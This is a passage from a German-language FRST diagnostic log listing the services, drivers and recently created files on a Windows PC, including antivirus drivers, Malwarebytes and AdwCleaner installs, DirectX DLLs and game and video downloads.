R2 Razer Chroma SDK Service; C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe [58368 2016-02-03] (Razer Inc.) [Datei ist nicht signiert]
R2 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [188072 2015-11-05] ()
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [37656 2016-04-15] (AVAST Software)
R1 aswKbd; C:\Windows\system32\drivers\aswKbd.sys [37144 2016-04-15] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [107792 2016-04-15] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [103064 2016-04-15] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [74544 2016-04-15] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1070904 2016-04-15] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [465792 2016-04-15] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [166432 2016-04-15] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [287528 2016-04-15] (AVAST Software)
R3 MEIx64; C:\Windows\System32\drivers\TeeDriverW8x64.sys [202032 2016-01-19] (Intel Corporation)
R0 ngvss; C:\Windows\System32\Drivers\ngvss.sys [161760 2016-04-15] (AVAST Software)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [28216 2016-04-05] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [56384 2016-03-21] (NVIDIA Corporation)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [589824 2015-10-30] (Realtek                                            )
R3 rzendpt; C:\Windows\System32\drivers\rzendpt.sys [50392 2015-08-13] (Razer Inc)
R2 rzpmgrk; C:\Windows\system32\drivers\rzpmgrk.sys [37184 2015-09-22] (Razer, Inc.)
R2 rzpnk; C:\Windows\system32\drivers\rzpnk.sys [130880 2015-12-14] (Razer, Inc.)
R2 VBoxAswDrv; C:\Program Files\AVAST Software\Avast\ng\vbox\VBoxAswDrv.sys [323392 2016-04-15] (Avast Software)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-04-18 11:46 - 2016-04-18 11:46 - 00010419 _____ C:\Users\Marcel\Desktop\FRST.txt
2016-04-18 11:45 - 2016-04-18 11:45 - 00000803 _____ C:\Users\Marcel\Desktop\AdwCleaner[S1].txt
2016-04-18 11:42 - 2016-04-18 11:42 - 03683904 _____ C:\Users\Marcel\Downloads\adwcleaner_5.112.exe
2016-04-18 11:41 - 2016-04-18 11:45 - 00000000 ____D C:\AdwCleaner
2016-04-18 11:41 - 2016-04-18 11:41 - 00001196 _____ C:\Users\Marcel\Desktop\mbam.txt
2016-04-18 11:35 - 2016-04-18 11:37 - 00012288 ___SH C:\Users\Marcel\Desktop\Thumbs.db
2016-04-18 11:34 - 2016-04-18 11:46 - 00000000 ____D C:\FRST
2016-04-18 11:34 - 2016-04-18 11:34 - 00005838 _____ C:\Users\Marcel\Desktop\Fixlog.txt
2016-04-18 11:32 - 2016-04-18 11:37 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-04-18 11:31 - 2016-04-18 11:31 - 00001171 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-04-18 11:31 - 2016-04-18 11:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-04-18 11:31 - 2016-04-18 11:31 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-04-18 11:31 - 2016-04-18 11:31 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-04-18 11:31 - 2016-03-10 14:09 - 00065408 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2016-04-18 11:31 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2016-04-18 11:31 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2016-04-18 11:30 - 2016-04-18 11:34 - 02375680 _____ (Farbar) C:\Users\Marcel\Desktop\FRST64.exe
2016-04-18 11:29 - 2016-04-18 11:30 - 22851472 _____ (Malwarebytes ) C:\Users\Marcel\Downloads\mbam-setup-2.2.1.1043.exe
2016-04-18 11:24 - 2016-04-18 11:25 - 336250455 _____ C:\Users\Marcel\Downloads\DDLValley.cool_FamGu.S14E17.720p.HDTV.x264-AVS.mkv
2016-04-18 11:23 - 2016-04-18 11:27 - 2152534442 _____ C:\Users\Marcel\Downloads\DDLValley.cool_vnl.S01E10.720p.HDTV.x264-AVS.mkv
2016-04-18 11:19 - 2016-04-18 11:19 - 00000000 ____D C:\Windows\SysWOW64\vbox
2016-04-18 11:19 - 2016-04-18 11:19 - 00000000 ____D C:\Windows\system32\vbox
2016-04-16 23:19 - 2016-04-16 23:19 - 00000000 ____D C:\Windows\system32\SleepStudy
2016-04-16 23:18 - 2016-04-16 23:18 - 00000000 ____D C:\Users\Marcel\AppData\Local\PeerDistRepub
2016-04-16 19:12 - 2016-04-16 19:15 - 1737182792 _____ C:\Users\Marcel\Downloads\DDLValley.cool_Banshee.S04E03.720p.HDTV.x264-KILLERS.mkv
2016-04-16 14:48 - 2016-04-16 14:48 - 00000000 ____D C:\Users\Marcel\Documents\SkidRow
2016-04-16 14:48 - 2016-04-16 14:48 - 00000000 ____D C:\Users\Marcel\AppData\Local\Fallout4
2016-04-16 14:33 - 2010-06-02 04:55 - 00527192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_7.dll
2016-04-16 14:33 - 2010-06-02 04:55 - 00518488 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_7.dll
2016-04-16 14:33 - 2010-06-02 04:55 - 00239960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_7.dll
2016-04-16 14:33 - 2010-06-02 04:55 - 00176984 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_7.dll
2016-04-16 14:33 - 2010-06-02 04:55 - 00077656 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_5.dll
2016-04-16 14:33 - 2010-06-02 04:55 - 00074072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_5.dll
2016-04-16 14:33 - 2010-05-26 11:41 - 02526056 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_43.dll
2016-04-16 14:33 - 2010-05-26 11:41 - 02106216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_43.dll
2016-04-16 14:33 - 2010-05-26 11:41 - 01907552 _____ (Microsoft Corporation) C:\Windows\system32\d3dcsx_43.dll
2016-04-16 14:33 - 2010-05-26 11:41 - 01868128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dcsx_43.dll
2016-04-16 14:33 - 2010-02-04 10:01 - 00530776 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_6.dll
2016-04-16 14:33 - 2010-02-04 10:01 - 00176984 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_6.dll
2016-04-16 14:33 - 2010-02-04 10:01 - 00078680 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_4.dll
2016-04-16 14:33 - 2010-02-04 10:01 - 00024920 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_7.dll
2016-04-16 14:33 - 2009-09-04 17:44 - 00517960 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_5.dll
2016-04-16 14:33 - 2009-09-04 17:44 - 00515416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_5.dll
2016-04-16 14:33 - 2009-09-04 17:44 - 00238936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_5.dll
2016-04-16 14:33 - 2009-09-04 17:44 - 00176968 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_5.dll
2016-04-16 14:33 - 2009-09-04 17:44 - 00073544 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_3.dll
2016-04-16 14:33 - 2009-09-04 17:44 - 00069464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_3.dll
2016-04-16 14:33 - 2009-09-04 17:29 - 05554512 _____ (Microsoft Corporation) C:\Windows\system32\d3dcsx_42.dll
2016-04-16 14:33 - 2009-09-04 17:29 - 05501792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dcsx_42.dll
2016-04-16 14:33 - 2009-09-04 17:29 - 02582888 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_42.dll
2016-04-16 14:33 - 2009-09-04 17:29 - 02475352 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_42.dll
2016-04-16 14:33 - 2009-09-04 17:29 - 01974616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_42.dll
2016-04-16 14:33 - 2009-09-04 17:29 - 01892184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_42.dll
2016-04-16 14:33 - 2009-09-04 17:29 - 00523088 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_42.dll
2016-04-16 14:33 - 2009-09-04 17:29 - 00453456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_42.dll
2016-04-16 14:33 - 2009-09-04 17:29 - 00285024 _____ (Microsoft Corporation) C:\Windows\system32\d3dx11_42.dll
2016-04-16 14:33 - 2009-09-04 17:29 - 00235344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx11_42.dll
2016-04-16 14:33 - 2009-03-16 14:18 - 00521560 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_4.dll
2016-04-16 14:33 - 2009-03-16 14:18 - 00517448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_4.dll
2016-04-16 14:33 - 2009-03-16 14:18 - 00235352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_4.dll
2016-04-16 14:33 - 2009-03-16 14:18 - 00174936 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_4.dll
2016-04-16 14:33 - 2009-03-16 14:18 - 00024920 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_6.dll
2016-04-16 14:33 - 2009-03-16 14:18 - 00022360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_6.dll
2016-04-16 14:33 - 2009-03-09 15:27 - 05425496 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_41.dll
2016-04-16 14:33 - 2009-03-09 15:27 - 02430312 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_41.dll
2016-04-16 14:33 - 2009-03-09 15:27 - 01846632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_41.dll
2016-04-16 14:33 - 2009-03-09 15:27 - 00520544 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_41.dll
2016-04-16 14:33 - 2009-03-09 15:27 - 00453456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_41.dll
2016-04-16 14:33 - 2008-10-27 10:04 - 00518480 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_3.dll
2016-04-16 14:33 - 2008-10-27 10:04 - 00514384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_3.dll
2016-04-16 14:33 - 2008-10-27 10:04 - 00074576 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_2.dll
2016-04-16 14:33 - 2008-10-27 10:04 - 00070992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_2.dll
2016-04-16 14:33 - 2008-10-15 06:22 - 05631312 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_40.dll
2016-04-16 14:33 - 2008-10-15 06:22 - 04379984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_40.dll
2016-04-16 14:33 - 2008-10-15 06:22 - 02605920 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_40.dll
2016-04-16 14:33 - 2008-10-15 06:22 - 02036576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_40.dll
2016-04-16 14:33 - 2008-10-15 06:22 - 00519000 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_40.dll
2016-04-16 14:33 - 2008-10-15 06:22 - 00452440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_40.dll
2016-04-16 14:32 - 2008-10-27 10:04 - 00235856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_3.dll
2016-04-16 14:32 - 2008-10-27 10:04 - 00175440 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_3.dll
2016-04-16 14:32 - 2008-10-27 10:04 - 00025936 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_5.dll
2016-04-16 14:32 - 2008-10-27 10:04 - 00023376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_5.dll
2016-04-16 14:32 - 2008-07-31 10:41 - 00238088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_2.dll
2016-04-16 14:32 - 2008-07-31 10:41 - 00177672 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_2.dll
2016-04-16 14:32 - 2008-07-31 10:41 - 00072200 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_1.dll
2016-04-16 14:32 - 2008-07-31 10:41 - 00068616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_1.dll
2016-04-16 14:32 - 2008-07-31 10:40 - 00513544 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_2.dll
2016-04-16 14:32 - 2008-07-31 10:40 - 00509448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_2.dll
2016-04-16 14:32 - 2008-07-10 11:01 - 00467984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_39.dll
2016-04-16 14:32 - 2008-07-10 11:00 - 04992520 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_39.dll
2016-04-16 14:32 - 2008-07-10 11:00 - 03851784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_39.dll
2016-04-16 14:32 - 2008-07-10 11:00 - 01942552 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_39.dll
2016-04-16 14:32 - 2008-07-10 11:00 - 01493528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_39.dll
2016-04-16 14:32 - 2008-07-10 11:00 - 00540688 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_39.dll
2016-04-16 14:32 - 2008-05-30 14:19 - 00511496 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_1.dll
2016-04-16 14:32 - 2008-05-30 14:19 - 00507400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_1.dll
2016-04-16 14:32 - 2008-05-30 14:18 - 00238088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_1.dll
2016-04-16 14:32 - 2008-05-30 14:18 - 00177672 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_1.dll
2016-04-16 14:32 - 2008-05-30 14:17 - 00068104 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_0.dll
2016-04-16 14:32 - 2008-05-30 14:17 - 00065032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_0.dll
2016-04-16 14:32 - 2008-05-30 14:17 - 00025608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_4.dll
2016-04-16 14:32 - 2008-05-30 14:16 - 00028168 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_4.dll
2016-04-16 14:32 - 2008-05-30 14:11 - 04991496 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_38.dll
2016-04-16 14:32 - 2008-05-30 14:11 - 03850760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_38.dll
2016-04-16 14:32 - 2008-05-30 14:11 - 01941528 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_38.dll
2016-04-16 14:32 - 2008-05-30 14:11 - 01491992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_38.dll
2016-04-16 14:32 - 2008-05-30 14:11 - 00540688 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_38.dll
2016-04-16 14:32 - 2008-05-30 14:11 - 00467984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_38.dll
2016-04-16 14:32 - 2008-03-05 16:04 - 00489480 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_0.dll
2016-04-16 14:32 - 2008-03-05 16:03 - 00479752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_0.dll
2016-04-16 14:32 - 2008-03-05 16:03 - 00238088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_0.dll
2016-04-16 14:32 - 2008-03-05 16:03 - 00177672 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_0.dll
2016-04-16 14:32 - 2008-03-05 16:00 - 00028168 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_3.dll
2016-04-16 14:32 - 2008-03-05 16:00 - 00025608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_3.dll
2016-04-16 14:32 - 2008-03-05 15:56 - 04910088 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_37.dll
2016-04-16 14:32 - 2008-03-05 15:56 - 03786760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_37.dll
2016-04-16 14:32 - 2008-03-05 15:56 - 01860120 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_37.dll
2016-04-16 14:32 - 2008-03-05 15:56 - 01420824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_37.dll
2016-04-16 14:32 - 2008-02-05 23:07 - 00529424 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_37.dll
2016-04-16 14:32 - 2008-02-05 23:07 - 00462864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_37.dll
2016-04-16 14:32 - 2007-10-22 03:40 - 00411656 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_10.dll
2016-04-16 14:32 - 2007-10-22 03:39 - 00267272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_10.dll
2016-04-16 14:32 - 2007-10-22 03:37 - 00021000 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_2.dll
2016-04-16 14:32 - 2007-10-22 03:37 - 00017928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_2.dll
2016-04-16 14:32 - 2007-10-12 15:14 - 05081608 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_36.dll
2016-04-16 14:32 - 2007-10-12 15:14 - 03734536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_36.dll
2016-04-16 14:32 - 2007-10-12 15:14 - 02006552 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_36.dll
2016-04-16 14:32 - 2007-10-12 15:14 - 01374232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_36.dll
2016-04-16 14:32 - 2007-10-02 09:56 - 00508264 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_36.dll
2016-04-16 14:32 - 2007-10-02 09:56 - 00444776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_36.dll
2016-04-16 14:32 - 2007-07-20 00:57 - 00411496 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_9.dll
2016-04-16 14:32 - 2007-07-20 00:57 - 00267112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_9.dll
2016-04-16 14:32 - 2007-07-19 18:14 - 05073256 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_35.dll
2016-04-16 14:32 - 2007-07-19 18:14 - 03727720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_35.dll
2016-04-16 14:32 - 2007-07-19 18:14 - 01985904 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_35.dll
2016-04-16 14:32 - 2007-07-19 18:14 - 01358192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_35.dll
2016-04-16 14:32 - 2007-07-19 18:14 - 00508264 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_35.dll
2016-04-16 14:32 - 2007-07-19 18:14 - 00444776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_35.dll
2016-04-16 14:32 - 2007-06-20 20:49 - 00409960 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_8.dll
2016-04-16 14:32 - 2007-06-20 20:46 - 00266088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_8.dll
2016-04-16 14:32 - 2007-05-16 16:45 - 04496232 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_34.dll
2016-04-16 14:32 - 2007-05-16 16:45 - 03497832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_34.dll
2016-04-16 14:32 - 2007-05-16 16:45 - 01401200 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_34.dll
2016-04-16 14:32 - 2007-05-16 16:45 - 01124720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_34.dll
2016-04-16 14:32 - 2007-05-16 16:45 - 00506728 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_34.dll
2016-04-16 14:32 - 2007-05-16 16:45 - 00443752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_34.dll
2016-04-16 14:32 - 2007-04-04 18:55 - 00403304 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_7.dll
2016-04-16 14:32 - 2007-04-04 18:55 - 00261480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_7.dll
2016-04-16 14:32 - 2007-04-04 18:54 - 00107368 _____ (Microsoft Corporation) C:\Windows\system32\xinput1_3.dll
2016-04-16 14:32 - 2007-03-15 16:57 - 00506728 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_33.dll
2016-04-16 14:32 - 2007-03-15 16:57 - 00443752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_33.dll
2016-04-16 14:32 - 2007-03-12 16:42 - 04494184 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_33.dll
2016-04-16 14:32 - 2007-03-12 16:42 - 01400176 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_33.dll
2016-04-16 14:32 - 2007-03-12 16:42 - 01123696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_33.dll
2016-04-16 14:32 - 2007-03-05 12:42 - 00017688 _____ (Microsoft Corporation) C:\Windows\system32\x3daudio1_1.dll
2016-04-16 14:32 - 2007-03-05 12:42 - 00015128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\x3daudio1_1.dll
2016-04-16 14:32 - 2007-01-24 15:27 - 00393576 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_6.dll
2016-04-16 14:32 - 2007-01-24 15:27 - 00255848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_6.dll
2016-04-16 14:32 - 2006-12-08 12:02 - 00251672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_5.dll
2016-04-16 14:32 - 2006-12-08 12:00 - 00390424 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_5.dll
2016-04-16 14:32 - 2006-11-29 13:06 - 04398360 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_32.dll
2016-04-16 14:32 - 2006-11-29 13:06 - 03426072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_32.dll
2016-04-16 14:32 - 2006-11-29 13:06 - 00469264 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10.dll
2016-04-16 14:32 - 2006-11-29 13:06 - 00440080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10.dll
2016-04-16 14:32 - 2006-09-28 16:05 - 03977496 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_31.dll
2016-04-16 14:32 - 2006-09-28 16:05 - 02414360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_31.dll
2016-04-16 14:32 - 2006-09-28 16:05 - 00237848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_4.dll
2016-04-16 14:32 - 2006-09-28 16:04 - 00364824 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_4.dll
2016-04-16 14:32 - 2006-07-28 09:31 - 00083736 _____ (Microsoft Corporation) C:\Windows\system32\xinput1_2.dll
2016-04-16 14:32 - 2006-07-28 09:30 - 00363288 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_3.dll
2016-04-16 14:32 - 2006-07-28 09:30 - 00236824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_3.dll
2016-04-16 14:32 - 2006-07-28 09:30 - 00062744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xinput1_2.dll
2016-04-16 14:32 - 2006-05-31 07:24 - 00230168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_2.dll
2016-04-16 14:32 - 2006-05-31 07:22 - 00354072 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_2.dll
2016-04-16 14:32 - 2006-03-31 12:41 - 03927248 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_30.dll
2016-04-16 14:32 - 2006-03-31 12:40 - 02388176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_30.dll
2016-04-16 14:32 - 2006-03-31 12:40 - 00352464 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_1.dll
2016-04-16 14:32 - 2006-03-31 12:39 - 00229584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_1.dll
2016-04-16 14:32 - 2006-03-31 12:39 - 00083664 _____ (Microsoft Corporation) C:\Windows\system32\xinput1_1.dll
2016-04-16 14:32 - 2006-03-31 12:39 - 00062672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xinput1_1.dll
2016-04-16 14:32 - 2006-02-03 08:43 - 03830992 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_29.dll
2016-04-16 14:32 - 2006-02-03 08:43 - 02332368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_29.dll
2016-04-16 14:32 - 2006-02-03 08:42 - 00355536 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_0.dll
2016-04-16 14:32 - 2006-02-03 08:42 - 00230096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_0.dll
2016-04-16 14:32 - 2006-02-03 08:41 - 00016592 _____ (Microsoft Corporation) C:\Windows\system32\x3daudio1_0.dll
2016-04-16 14:32 - 2006-02-03 08:41 - 00014032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\x3daudio1_0.dll
2016-04-16 14:32 - 2005-12-05 18:09 - 03815120 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_28.dll
2016-04-16 14:32 - 2005-12-05 18:09 - 02323664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_28.dll
2016-04-16 14:32 - 2005-07-22 19:59 - 03807440 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_27.dll
2016-04-16 14:32 - 2005-07-22 19:59 - 02319568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_27.dll
2016-04-16 14:32 - 2005-05-26 15:34 - 03767504 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_26.dll
2016-04-16 14:32 - 2005-05-26 15:34 - 02297552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_26.dll
2016-04-16 14:32 - 2005-03-18 17:19 - 03823312 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_25.dll
2016-04-16 14:26 - 2016-04-16 14:26 - 00001328 _____ C:\Users\Public\Desktop\Fallout 4.lnk
2016-04-16 14:26 - 2016-04-16 14:26 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Fallout 4
2016-04-16 14:08 - 2016-04-16 14:08 - 00000000 ____D C:\Program Files (x86)\Bethesda Softworks
2016-04-15 23:13 - 2016-04-15 23:13 - 00000000 ____D C:\Users\Marcel\AppData\Local\CrashDumps
2016-04-15 23:06 - 2005-03-18 17:19 - 02337488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_25.dll
2016-04-15 23:06 - 2005-02-05 19:45 - 03544272 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_24.dll
